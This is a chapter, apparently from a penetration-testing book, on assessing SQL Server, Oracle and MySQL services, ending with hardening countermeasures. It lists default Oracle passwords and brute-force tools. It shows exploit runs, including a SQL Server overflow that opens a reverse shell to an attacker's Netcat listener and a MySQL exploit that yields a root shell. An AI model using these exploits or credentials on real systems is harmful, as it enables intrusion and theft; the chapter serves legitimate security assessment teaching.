Chapter 9. Assessing Database Services
This chapter focuses on the remote assessment of SQL database services used in most corporate networks to facilitate rapid and effective storage and retrieval of data. If these services aren’t configured or protected correctly at both the application and network levels, they can be used to great effect to compromise networks and sensitive data.
Popular SQL database services that are often found are Microsoft SQL Server, Oracle, and MySQL, accessible through the following network ports:
ms-sql 1433/tcp ms-sql-ssrs 1434/udp ms-sql-hidden 2433/tcp oracle-tns 1521/tcp oracle-tns-alt 1526/tcp oracle-tns-alt 1541/tcp mysql 3306/tcp
Here I discuss the remote enumeration, brute-force password grinding, and process manipulation attacks you can launch to gain access to these popular database services. A useful online resource for database testing and current information is http://www.databasesecurity.com, which also includes useful details relating to less popular database services, including DB2, PostgreSQL, Informix, and Sybase.
Microsoft SQL Server
The Microsoft SQL Server service can be found running by default on TCP port 1433. Sometimes I find that the SQL Server service is run in hidden mode, accessible via TCP port 2433 (yes, this is what Microsoft means by hidden!), or listening on high ports, and used by client software such as Symantec Backup Exec.
The SQL Server Resolution Service (SSRS) was introduced in Microsoft SQL Server 2000 to provide referral services for multiple SQL server instances running on the same machine. The service listens for requests on UDP port 1434 and returns the IP address and port number of the SQL server instance that provides access to the requested database.
Interacting with Microsoft SQL Server
Microsoft SQL Server can use the following transport protocols:
TCP/IP (TCP port 1433 or other ports, depending on configuration)
Microsoft RPC (using numerous protocol sequences, see Chapter 10)
Named pipes (accessible via authenticated SMB sessions, see Chapter 10)
Here I’ll discuss assessment using direct TCP/IP access to the service (through port 1433) and named pipes (through ports 139 and 445), tackling brute-force password grinding and process manipulation vulnerabilities in particular.
SQL Server Enumeration
Two tools that can be used to perform SQL Server enumeration tasks are SQLPing and MetaCoretex, as covered here.
SQLPing
You can use Chip Andrews’ SQLPing Windows command-line utility to enumerate SQL Server details through the SSRS port (UDP 1434). SQLPing is available from http://examples.oreilly.com/networksa/tools/sqlping.zip.
Example 9-1 shows SQLPing in use against a SQL 2000 Server, revealing the server name, database instance name, and clustering information, along with version details and network port/named pipe information.
D:SQL> sqlping 192.168.0.51
SQL-Pinging 192.168.0.51
Listening....
ServerName:dbserv
InstanceName:MSSQLSERVER
IsClustered:No
Version:8.00.194
tcp:1433
np:\dbservpipesqlqueryTip
Since 2002, Chip Andrews has actively updated SQLPing, and it now has a GUI along with brute force and other features. For further details, please visit http://www.sqlsecurity.com.
Interestingly, even if the SQL Server has been patched using the latest service pack and Microsoft security hotfixes, the version remains at 8.00.194 (when it is actually 8.00.762 if SP3 is installed). Therefore, the exact version number reported through the SSRS shouldn’t be trusted.
For information purposes, Table 9-1 lists SQL versions reported by Microsoft SQL, so that you can enumerate the service pack and patch level of the service.
Version string | SQL Server version and notes |
9.00.2047 | SQL Server 2005 SP1 |
9.00.1399.06 | SQL Server 2005 |
9.00.1314 and earlier | SQL Server 2005 (community previews and beta versions) |
8.00.2187 | SQL Server 2000 SP4 + hotfix 916287 |
8.00.2162 | SQL Server 2000 SP4 + hotfix 904660 |
8.00.2151 | SQL Server 2000 SP4 + hotfix 903742 |
8.00.2148 | SQL Server 2000 SP4 + various hotfixes |
8.00.2040 | SQL Server 2000 SP4 + hotfix 899761 |
8.00.2039 | SQL Server 2000 SP4 |
8.00.760 | SQL Server 2000 SP3 |
8.00.534 | SQL Server 2000 SP2 |
8.00.384 | SQL Server 2000 SP1 |
8.00.194 | SQL Server 2000 |
7.00.1078 | SQL Server 7.0 SP4 + security update (Q327068) |
7.00.1063 | SQL Server 7.0 SP4 |
7.00.961 | SQL Server 7.0 SP3 |
7.00.842 | SQL Server 7.0 SP2 |
7.00.699 | SQL Server 7.0 SP1 |
7.00.623 | SQL Server 7.0 |
Further discussion of Microsoft SQL Server version numbers and querying can be found in Microsoft KB article 321185 (http://support.microsoft.com/kb/321185).
MetaCoretex
MetaCoretex (http://sourceforge.net/projects/metacoretex/) is a modular database vulnerability scanner written entirely in Java and effective at testing Microsoft SQL Server, Oracle, and MySQL databases. The scanner has a number of Microsoft SQL Server probes. In particular, here are some useful remote tests:
SQL Server service pack check
Auditing tests to determine which actions are logged
Various dangerous stored procedures checks
SQL Server brute force
SQL Server Brute Force
ForceSQL and sqlbf are two SQL Server brute-force utilities you can run from the Windows command line; they are available at:
| http://examples.oreilly.com/networksa/tools/forcesql.zip |
| http://examples.oreilly.com/networksa/tools/sqlbf.zip |
On the open source Unix-based side of things, the sqldict utility found within the SQL Auditing Tool (SQLAT) toolkit (http://www.cqure.net/wp/?page_id=6) can effectively launch SQL Server brute-force attacks over TCP port 1433.
The sqlbf utility is especially useful because it allows for SQL Server username and password combinations to be guessed through both the TCP/IP (port 1433) and named pipe (port 139 and 445) transports. The tool can be used as follows:
D:sql> sqlbf
Usage: sqlbf [ODBC NetLib] [IP List] [User list] [Password List]
ODBC NetLib : T - TCP/IP, P - Named Pipes (NetBIOS)The SQL administrator account under Microsoft SQL Server is called sa. Many SQL Server 6.0, 6.5, 7.0, and 2000 installations can be found with no password set; however, SQL Server 2003 and later don’t permit the password to remain blank. SQL Server 6.5 has a second default account named probe used for performance analysis, also with no password.
SQLAT
Patrik Karlsson wrote an excellent toolkit for easily compromising the underlying server upon gaining access to the SQL service, called SQLAT, available at http://www.cqure.net/tools.jsp?id=6.
SQLAT is highly effective and well-developed, restoring the xp_cmdshell stored procedure if it has been removed, and allowing you to upload files, dump registry keys, and access the SAM database.
SQL Server Process Manipulation Vulnerabilities
A number of serious vulnerabilities have been uncovered in Microsoft SQL Server in recent years. Table 9-2 lists remotely and locally exploitable SQL Server vulnerabilities with corresponding MITRE CVE references.
CVE reference | Date | Notes |
CVE-2004-1560 | 28/09/2004 | SQL Server 7.0 SP3 remote DoS vulnerability and potential arbitrary code execution |
CVE-2003-0496 | 08/07/2003 | Windows 2000 SP3 CreateFile( ) privilege escalation vulnerability, locally exploitable via SQL Server using the xp_fileexist stored procedure |
CVE-2003-0353 | 21/08/2003 | Microsoft Data Access Components (MDAC) 2.7 SP1 overflow, remotely exploitable through a long broadcast request to the SQL Server resolution service via UDP port 1434 |
CVE-2003-0232 | 23/07/2003 | SQL Server 7.0, 2000, and MSDE local arbitrary code execution via Local Procedure Calls (LPCs) |
CVE-2003-0230 | 23/07/2003 | SQL Server 7.0, 2000, and MSDE named pipe hijacking issue, resulting in local privilege escalation |
CVE-2002-1981 | 03/09/2002 | SQL Server 2000 SP2 local configuration modification vulnerability |
CVE-2002-1145 | 16/10/2002 | SQL Server 7.0, 2000, and MSDE local privilege escalation vulnerability via xp_runwebtask |
CVE-2002-1123 | 05/08/2002 | SQL Server 7.0, 2000, and MSDE remotely exploitable “hello” overflow |
CVE-2002-0859 | 27/05/2002 | Microsoft JET engine 4.0 OpenDataSource( ) overflow, locally exploitable via SQL Server 2000 and other vectors |
CVE-2002-0649 | 25/07/2002 | Multiple overflows in SQL Server 2000 resolution service, remotely exploitable via requests to UDP port 1434 |
At the time of this writing, exploits for CVE-2002-1123 (“hello”
overflow) and CVE-2002-0649 (0x04
leading-byte overflow) are supported within CORE IMPACT, Immunity
CANVAS, and MSF.
GLEG VulnDisco doesn’t cover any Microsoft SQL Server issues at this time, but the Argeniss 0day ultimate exploits pack contains a zero-day, unpatched, DoS exploit for SQL Server 2000, along with a man-in-the-middle NTLM privilege escalation exploit.
SQL resolution service overflow (CVE-2002-0649) demonstration
The SQL resolution service overflow (CVE-2002-0649) can easily be exploited using the standalone ms-sql.exe, available along with source code from the O’Reilly archive at:
| http://examples.oreilly.com/networksa/tools/ms-sql.exe |
| http://examples.oreilly.com/networksa/tools/ms-sql.cpp |
Example 9-2 shows the ms-sql exploit usage. The stack overflow
creates a connect-back reverse shell from the SQL server back to the
user, which is useful if a half-decent firewall policy is in place
blocking access to high ports on the server.
D:SQL> ms-sql
===============================================================
SQL Server UDP Buffer Overflow Remote Exploit
Modified from "Advanced Windows Shellcode"
Code by David Litchfield, [email protected]
Modified by lion, fix a bug.
Welcome to HUC web site http://www.cnhonker.com
Usage:
sql Target [<NCHost> <NCPort> <SQLSP>]
Exemple:
C:> nc -l -p 53
Target is MSSQL SP 0:
C:> ms-sql 192.168.0.1 192.168.7.1 53 0
Target is MSSQL SP 1 or 2:
c:> ms-sql 192.168.0.1 192.168.7.1 53 1In my lab environment, I am on 192.168.189.1, attacking a server at
10.0.0.5. I use the exploit
(shown in Example 9-3) to
send the exploit payload, which results in the server connecting
back to me on TCP port 53 with a command prompt.
D:SQL> ms-sql 10.0.0.5 192.168.189.1 53 1
Service Pack 1 or 2.
Import address entry for GetProcAddress @ 0x42ae101C
Packet sent!
If you don't have a shell it didn't work.At the same time, I set up my Netcat listener on TCP port 53. Upon sending the overflow code to the vulnerable service, an interactive command prompt is spawned from the remote server, as shown in Example 9-4.
Oracle
Here I describe user and database enumeration techniques, password grinding, and process manipulation attacks that can be launched against the Oracle database service.
The Transparent Network Substrate (TNS) protocol is used by Oracle clients to connect to database instances via the TNS listener service. This service listens on TCP port 1521 by default (although it is sometimes found on ports 1526 or 1541) and acts as a proxy between database instances and the client system. Figure 9-1 shows an example Oracle web application architecture.
TNS Listener Enumeration and Information Leak Attacks
The listener service has its own authentication mechanism and is controlled and administered outside the Oracle database. In its default configuration, the listener service has no authentication set, which allows commands and tasks to be executed outside the database.
tnscmd.pl is an excellent tool you can use to interact with the TNS listener. It’s a Perl script that’s available from http://www.jammed.com/~jwa/hacks/security/tnscmd/.
Pinging the TNS listener
You can use tnscmd.pl to
issue various commands to the TNS listener service. Example 9-5 shows the default
ping command being issued to the
listener to solicit a response.
$ perl tnscmd.pl -h 192.168.189.45
connect writing 87 bytes [(CONNECT_DATA=(COMMAND=ping))]
.W.......6.,...............:................4.............(CONNECT_DATA=
(COMMAND=ping))
read
..."..=(DESCRIPTION=(TMP=)(VSNNUM=135294976)(ERR=0)(ALIAS=LISTENER))
eonThe VSNUM is the Oracle
version number in decimal, which you can convert to hex. Figure 9-2 shows that the
Base Converter application determines the version as 8.1.7.
Retrieving Oracle version and platform information
You can issue a version
command to the TNS listener using tnscmd.pl, as shown in Example 9-6. In this case, I
learn that the server is running Oracle 8.1.7 on Solaris.
$ perl tnscmd.pl version -h 192.168.189.45
connect writing 90 bytes [(CONNECT_DATA=(COMMAND=version))]
.Z.......6.,...............:................4.............(CONNECT_DATA=
(COMMAND=version))
read
.M.......6.........-............(DESCRIPTION=(TMP=)(VSNNUM=135294976
)(ERR=0)).b........TNSLSNR.for.Solaris:.Version.8.1.7.0.0.-.Producti
on..TNS.for.Solaris:.Version.8.1.7.0.0.-.Production..Unix.Domain.Soc
ket.IPC.NT.Protocol.Adaptor.for.Solaris:.Version.8.1.7.0.0.-.Develop
ment..Oracle.Bequeath.NT.Protocol.Adapter.for.Solaris:.Version.8.1.7
.0.0.-.Production..TCP/IP.NT.Protocol.Adapter.for.Solaris:.Version.8
.1.7.0.0.-.Production,,.........@
eonOther TNS listener commands
The tnscmd.pl documentation written and maintained by James W. Abendschan at http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd-doc.html lists a number of TNS listener commands that can be executed remotely using the tool; they are listed in Table 9-3. This is only a summary of the tool and its use—I recommend further investigation of tnscmd.pl if you are interested in Oracle security.
Command | Notes |
ping | Pings the listener |
version | Provides output of the listener version and platform information |
status | Returns the current status and variables used by the listener |
debug | Dumps debugging information to the listener log |
reload | Reloads the listener config file |
services | Dumps service data |
save_config | Writes the listener config file to a backup location |
stop | Shuts down the listener |
Retrieving the current status of the TNS listener
You can send a status
command to the listener that returns a number of useful pieces of
information. Example 9-7
shows this command being issued.
$ perl tnscmd.pl status -h 192.168.189.46
connect writing 89 bytes [(CONNECT_DATA=(COMMAND=status))]
.W.......6.,...............:................4.............(CONNECT_DATA=
(COMMAND=status))
writing 89 bytes
read
........"..v.........(DESCRIPTION=(ERR=1153)(VSNNUM=135290880)(ERROR
.........6.........'.............j........(DESCRIPTION=(TMP=)(VSNNUM
=135290880)(ERR=0)(ALIAS=LISTENER)(SECURITY=OFF)(VERSION=TNSLSNR.for
.Solaris:.Version.8.1.6.0.0.-.Production)(START_DATE=01-SEP-2000.18:
35:49)(SIDNUM=1)(LOGFILE=/u01/app/oracle/product/8.1.6/network/log/l
istener.log)(PRMFILE=/u01/app/oracle/product/8.1.6/network/admin/lisThe SECURITY=OFF setting
within the information returned tells me that the TNS listener is
set with no authentication and thus allows anonymous remote
attackers to launch attacks with relative ease. It also retrieves
LOGFILE details and many other
variables that have been stripped for brevity.
Executing an information leak attack
An interesting vulnerability that was publicly reported by ISS X-Force in October 2000, but also found by James W. Abendschan, is that which occurs when the cmdsize variable of a given TNS listener command request is falsified.
In Example 9-8, I send a
standard 87-byte ping request to
the listener, but report the cmdsize as being 256 bytes in total. The
TNS listener responds with over 380 bytes of data, containing
hostname, SQL usernames, and other active session information. If I
execute this same attack multiple times on a busy server, I will
compromise most of the database usernames. The SQL*Net login process
is handled by a child process, and so this memory leak issue doesn’t
reveal passwords.
$ perl tnscmd.pl -h 192.168.189.44 --cmdsize 256
Faking command length to 256 bytes
connect writing 87 bytes [(CONNECT_DATA=(COMMAND=ping))]
.W.......6.,...............:................4.............(CONNECT_DATA=
(COMMAND=ping))
read
........"..v.........(DESCRIPTION=(ERR=1153)(VSNNUM=135290880)(ERROR
_STACK=(ERROR=(CODE=1153)(EMFI=4)(ARGS='(CONNECT_DATA=(COMMAND=ping)
)OL=TCP)(HOST=oraclesvr)(PORT=1541))(CONNECT_DATA=(SERVICE_NAME=pr01
)(CID=(PROGRAM=)(HOST=oraclesvr)(USER=oracle))))HOST=TOM)(USER=tom))
))ORANTBINifrun60.EXE)(HOST=ENGINEERING-1)(USER=Rick))))im6IM60.
EXE)(HOST=RICK)(U'))(ERROR=(CODE=303)(EMFI=1))))
eonTNS Listener Process Manipulation Vulnerabilities
Several serious remote vulnerabilities are present in default TNS listener configurations (i.e., with no authentication set), as listed in Table 9-4. Many locally exploitable privilege escalation issues exist within Oracle itself (which require authenticated access through the TNS listener to a valid database); these are discussed in the following section.
CVE name | Date | Notes |
CVE-2004-1364 | 23/12/2004 | Oracle 10.1.0.2, 9.2.0.5, and 8.1.7.4 ExtProc library directory traversal bug |
CVE-2004-1363 | 23/12/2004 | Oracle 10.1.0.2, 9.2.0.5, and 8.1.7.4 ExtProc environment variable overflow |
CVE-2003-0095 | 11/02/2003 | Oracle 9.2 and 8.1.7 username overflow |
CVE-2002-0965 | 12/06/2002 | Oracle 9.0.1 SERVICE_NAME stack overflow |
CVE-2002-0857 | 14/08/2002 | Oracle 9.2 and 8.1.7 listener control utility (LSNRCTL) format string bug |
CVE-2002-0567 | 06/02/2002 | Oracle 9.0.1 and 8.1.7 ExtProc command execution vulnerability |
CVE-2001-0499 | 27/06/2002 | Oracle 8.1.7 COMMAND stack overflow |
CVE-2000-0818 | 25/10/2000 | Oracle 8.1.6 LOG_FILE command arbitrary file creation bug |
Tip
Two useful web sites that provide current information relating to pre- and post-authentication Oracle vulnerabilities are http://www.red-database-security.com and http://www.databasesecurity.com/oracle.htm. The Red-Database-Security site has a very large number of upcoming and published advisories relating to post-authentication issues (mainly SQL injection and privilege escalation bugs).
CORE IMPACT supports CVE-2003-0095 (Oracle 9.2 and 8.1.7
username overflow) and CVE-2001-0499 (Oracle 8.1.7 TNS listener
COMMAND stack overflow). Immunity
CANVAS only supports 2001-0499 at this time, and MSF has no support
for Oracle Database Server issues exploitable through the TNS
listener.
The Argeniss ultimate 0day exploits pack for Immunity CANVAS includes a large number of Oracle Database Server exploit scripts (of which a number are zero-day and unpatched), which result in local privilege escalation and DoS conditions in particular.
Oracle Brute-Force and Post-Authentication Issues
If you can communicate freely with the TNS Listener, you can attempt to connect to and authenticate with backend database instances. Oracle client utilities such as sqlplus, or open source equivalents such as Yet Another SQL*Plus Replacement (YASQL, available from http://sourceforge.net/projects/yasql/), can easily be fed SQL username and password combinations from a shell script or similar process. Some products, such as NGSSquirreL (http://www.nextgenss.com/products/), can do this effectively on the commercial side. Table 9-5 contains a list of default, preinstalled Oracle database users and their passwords.
Username | Password |
ADAMS | WOOD |
BLAKE | PAPER |
CLARK | CLOTH |
CTXSYS | CTXSYS |
DBSNMP | DBSNMP |
DEMO | DEMO |
JONES | STEEL |
MDSYS | MDSYS |
MTSSYS | MTSSYS |
ORDPLUGINS | ORDPLUGINS |
ORDSYS | ORDSYS |
OUTLN | OUTLN |
SCOTT | TIGER |
SYS | CHANGE_ON_INSTALL |
SYSTEM | MANAGER |
Phenoelit’s excellent Default Password List (DPL) contains a number of other common Oracle passwords, and is accessible at http://www.phenoelit.de/dpl/dpl.html.
If you are going to brute-force Oracle user passwords and compromise database instances, you need a decent understanding of the SQL*Plus client to navigate around the database and do anything productive.
OAT
For novices wishing to abuse default Oracle passwords to gain underlying system access, the Oracle Auditing Tools (OAT) package is available for Windows platforms at http://www.cqure.net/tools.jsp?id=7.
In particular, the OAT toolkit contains simple scripts you can use to execute commands, upload and download files via TFTP, and dump the SAM database of Windows-based Oracle servers.
MetaCoretex
As mentioned earlier in this chapter, MetaCoretex (http://sourceforge.net/projects/metacoretex/) is a Java database vulnerability scanner. In particular, the scanner has a number of pre- and post-authentication Oracle probes. In particular, some useful remote tests are:
TCP bounce port scanning through the Oracle database using UTL_TCP
Oracle database SID enumeration
TNS security settings and status
Post-authentication Oracle database vulnerabilities and exploits
Upon authenticating with a valid database SID through the TNS listener, there are many local privilege escalation and overflow issues within Oracle. A handful of recent locally exploitable bugs, as listed in MITRE CVE, are given in Table 9-6. Many issues in the CVE list have insufficient information (as Oracle released patches without providing adequate details), and so it is difficult to put together a meaningful list of bugs. I have assembled this list by cross-referencing the Oracle exploit scripts available through milw0rm (http://www.milw0rm.com) with ISS X-Force (http://xforce.iss.net), MITRE CVE (http://cve.mitre.org), and the Oracle security center (http://www.oracle.com/technology/deploy/security/index.html).
CVE reference | Notes | Fixed in CPU | Milw0rm exploit(s) |
CVE-2007-1442 | Oracle 10.2.0.2 NULL pDacl parameter privilege escalation vulnerability | 04/2007 | 3451 |
CVE-2006-5335 | 10/2006 | 3177 | |
CVE-2006-3702 | Oracle 10.2.0.2 and 9.2.0.7 DBMS_EXPORT_EXTENSION SQL injection bug | 07/2006 | 3269 |
CVE-2006-3698 | Oracle 10.1.0.5 KUPW$WORKER.MAIN SQL injection vulnerability | 07/2006 | 3375 and 3358 |
CVE-2006-2505 | Oracle 10.2.0.2, 9.2.07, and 8.1.7.4 DBMS_EXPORT_EXTENSION local command execution bug | 07/2006 | 1719 |
CVE-2006-0272 | Oracle 10.1.0.4 and 9.2.0.7 DBMS_XMLSCHEMA overflows | 01/2006 | 1455 |
CVE-2006-0586 | Oracle 10.1.0.3 KUPV$FT.ATTACH_JOB vulnerability | 01/2006 | 3359 and 3376 |
CVE-2006-0547 | Oracle 10.1.0.4.2, 9.2.0.7, and 8.1.7.4 AUTH_ALTER_SESSION privilege escalation bug | 01/2006 | N/A |
CVE-2006-0260 | Oracle 10.1.0.5 and 9.2.0.7 DBMS_METADATA SQL injection exploit | 01/2006 | 3363 and 3377 |
CVE-2005-4832 | Oracle 10.1.0.4 and 9.2.0.5 DBMS_CDC_SUBSCRIBE and DBMS_CDC_ISUBSCRIBE SQL injection vulnerabilities | 04/2005 | 3378 and 3364 |
CVE-2005-0701 | Oracle 9.2 and 8.1.7 UTL_FILE functions allow arbitrary files to be read or written | 04/2005 | 2959 |
CVE-2004-1774 | Oracle 10.1.0.2 SDO_CODE_SIZE overflow via long LAYER parameter | 08/2004 | 932 |
CVE-2004-1371 | Oracle 10.1.0.2, 9.2.0.5, and 8.1.7 PL/SQL “wrapped procedure” overflow | 08/2004 | N/A |
CVE-2004-1364 | Oracle 9i / 10g ExtProc command execution | 08/2004 | 2951 |
The milw0rm exploits listed in Table 9-6 are available from the site using a URL such as http://www.milw0rm.com/exploits/932, and they are zipped and available from the O’Reilly tools archive at http://examples.oreilly.com/networksa/tools/milw0rm_oracle.zip. Oracle Critical Patch Update (CPU) details are available from the Oracle security center at http://www.oracle.com/technology/deploy/security/alerts.htm.
A recommended book specializing in Oracle security testing and countermeasures is The Oracle Hacker’s Handbook by David Litchfield (Wiley, 2007), which contains detailed information relating to Oracle database testing. A useful and recent PDF documenting Oracle issues and hardening strategies is available from http://www.red-database-security.com/wp/hacking_and_hardening_oracle_xe.pdf.
Oracle XDB Services
If the Oracle XDB FTP and HTTP services are accessible on TCP ports 2100 and 8080, respectively, CORE IMPACT and MSF can be used to launch attacks against the services, resulting in arbitrary command execution. The issue is listed in CVE as CVE-2003-0727, and the relevant MSF modules are:
MySQL
MySQL is commonly found running on TCP port 3306 on Linux and FreeBSD servers. The database is relatively straightforward to administer, with a much simpler access model than the heavyweight, but more scalable Oracle.
MySQL Enumeration
The version of the target MySQL database can be easily gleaned simply by using Netcat or Telnet to connect to port 3306 and analyzing the string received, as shown here:
$ telnet 10.0.0.8 3306
Trying 10.0.0.8...
Connected to 10.0.0.8.
Escape character is '^]'.
(
3.23.52D~n.7i.G,
Connection closed by foreign host.The version of MySQL in this case is 3.23.52. If the server has been configured with a strict list of client systems defined, you will see a response like this:
$ telnet db.example.org 3306
Trying 192.168.189.14...
Connected to db.example.org.
Escape character is '^]'.
PHost 'cyberforce.segfault.net' is not allowed to connect to this MySQL server
Connection closed by foreign host.MySQL Brute Force
By default, the MySQL database accepts user logins as root with no password. A simple Unix-based utility called finger_mysql is useful for testing network blocks for MySQL instances that accept a blank root password, available in source form at http://www.securiteam.com/tools/6y00l0u5pc.html.
When the tool compromises the database, it lists the users and their password hashes from the mysql.user table. There are a number of tools in the Packet Storm archive that can be used to crack these encrypted passwords.
If a blank root password doesn’t provide access, the THC Hydra utility can be used to launch a parallel MySQL brute-force attack.
By performing brute-force password grinding and assessment of the underlying database configuration and features, MetaCoretex can also assess MySQL instances efficiently.
MySQL Process Manipulation Vulnerabilities
At the time of this writing, MITRE CVE (http://cve.mitre.org) lists a number of serious, remotely exploitable vulnerabilities in MySQL (i.e., not authenticated or denial-of-service issues), as shown in Table 9-7.
Date | Notes | |
CVE-2006-4226 | 17/08/2006 | MySQL 5.1.11, 5.0.24, and 4.1.20 post-authentication database access issue relating to case-sensitive filesystems |
CVE-2006-2753 | 31/05/2006 | MySQL 5.0.21 and 4.1.19 post-authentication SQL injection through multibyte encoded escape characters |
CVE-2006-1518 | 03/05/2006 | MySQL 5.0.20 post-authentication COM_TABLE_DUMP request overflow |
CVE-2006-1517 | 03/05/2006 | MySQL 5.0.20, 4.1.18, and 4.0.26 post-authentication information leak via COM_TABLE_DUMP request |
CVE-2006-1516 | 03/05/2006 | MySQL 5.0.20, 4.1.18, and 4.0.26 information leak via malformed username |
CVE-2005-2572 and CVE-2005-2573 | 08/08/2005 | Multiple Windows MySQL post-authentication issues resulting in DoS and potential arbitrary code execution |
CVE-2005-2558 | 08/08/2005 | MySQL 5.0.7-beta and 4.1.13 post-authentication init_syms( ) overflow |
CVE-2005-0709 and CVE-2004-0710 | 11/03/2005 | MySQL 4.1.10 post-authentication library access issues, resulting in arbitrary code execution |
CVE-2004-0836 | 20/08/2004 | MySQL 4.0.20 mysql_real_connect( ) overflow using a malicious DNS server |
CVE-2004-0627 and CVE-2004-0628 | 01/07/2004 | MySQL 4.1.2 zero-length scrambled string authentication bypass and overflow |
CVE-2003-0780 | 10/09/2003 | MySQL 4.0.15 post-authentication privilege escalation vulnerability |
CVE-2002-1374 and CVE-2002-1375 | 12/12/2002 | MySQL 4.0.5a COM_CHANGE_USER password overflow and authentication bypass |
CVE-2001-1453 | 09/02/2001 | MySQL 3.22.33 crafted client hostname overflow |
CVE-2000-0148 | 08/02/2000 | MySQL 3.22.32 unauthenticated remote access vulnerability |
MySQL exploit scripts
The original BugTraq posting from May 3, 2006, regarding CVE-2006-1516, CVE-2006-1517, and CVE-2006-1518 is accessible at: http://www.securityfocus.com/archive/1/archive/1/432734/100/0/threaded.
A proof-of-concept exploit script for CVE-2004-0627 (MySQL 4.1.2 authentication bypass) is available from http://www.securiteam.com/exploits/5ep0720dfs.html. A handful of other exploits for MySQL issues are available from http://www.milw0rm.com.
An exploit for CVE-2003-0780 (MySQL 4.0.15 post-authentication privilege escalation issue) is available at http://packetstormsecurity.org/0309-exploits/09.14.mysql.c. Example 9-9 shows the exploit script in use against a vulnerable MySQL server, providing root access to the operating system. For exploit usage and options, simply run the tool with no arguments.
$ ./mysql -d 10.0.0.8 -p "" -t 1
@-------------------------------------------------@
# Mysql 3.23.x/4.0.x remote exploit(2003/09/12) #
@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @
---------------------------------------------------
[+] Connecting to mysql server 10.0.0.8:3306....ok
[+] ALTER user column...ok
[+] Select a valid user...ok
[+] Found a user:test
[+] Password length:480
[+] Modified password...ok
[+] Finding client socket......ok
[+] socketfd:3
[+] Overflow server....ok
[+] sending OOB.......ok
[+] Waiting a shell.....
bash-2.05#Exploitation framework support for MySQL.
At the time of this writing, MSF supports none of these MySQL issues. CORE IMPACT supports CVE-2005-0709 (MySQL 4.1.10 post-authentication arbitrary code execution), CVE-2003-0780 (MySQL 4.0.15 post-authentication privilege escalation), and CVE-2002-1374 (MySQL 4.0.5a COM_CHANGE_USER overflow).
Immunity CANVAS supports CVE-2004-0627 (MySQL 4.1.2 authentication bypass) at this time, and in terms of add-on exploit packs, GLEG VulnDisco has a number of zero-day post-authentication exploit and DoS modules for MySQL 5.x and 4.1.x, and Argeniss 0day ultimate exploits pack has a number of DoS modules for MySQL 5.x.
MySQL UDF library injection.
In Chris Anley’s “Hackproofing MySQL” paper at http://www.ngssoftware.com/papers/hackproofingmysql.pdf, he discusses using User Defined Function (UDF) support to load a custom-written dynamic library and in turn, to execute arbitrary commands on the underlying operating platform. The exploit and discussion text are available from the following locations:
| http://www.securiteam.com/exploits/6g00p1pc0u.html |
| http://www.0xdeadbeef.info/exploits/raptor_udf.c |
Database Services Countermeasures
The following countermeasures should be considered when hardening database services:
Ensure that database user passwords (sa and probe accounts found in Microsoft SQL Server, root under MySQL, etc.) are adequately strong.
Filter and control public Internet-based access to database service ports to prevent determined attackers from launching brute-force password-grinding attacks in particular. In the case of Oracle with the TNS Listener, this point is extremely important.
Don’t run publicly accessible remote maintenance services on database servers; you will thus deter Oracle TNS Listener user .rhosts file creation and other types of grappling-hook attacks. If possible, use two-factor authentication for remote access from specific staging hosts, or SSH with public keys.
There are so many outstanding and zero-day weaknesses in Oracle that it is imperative that your Oracle database services be patched as soon as CPU packages are available. Oracle databases should also be hardened to prevent access to unnecessary stored procedures and features. Oracle database server is so feature-rich that it is problematic to secure without a deep understanding.
If SQL services are accessible from the Internet or other untrusted networks, ensure they are patched with the latest service packs and security hotfixes to ensure resilience from buffer overflows and other types of remote attacks.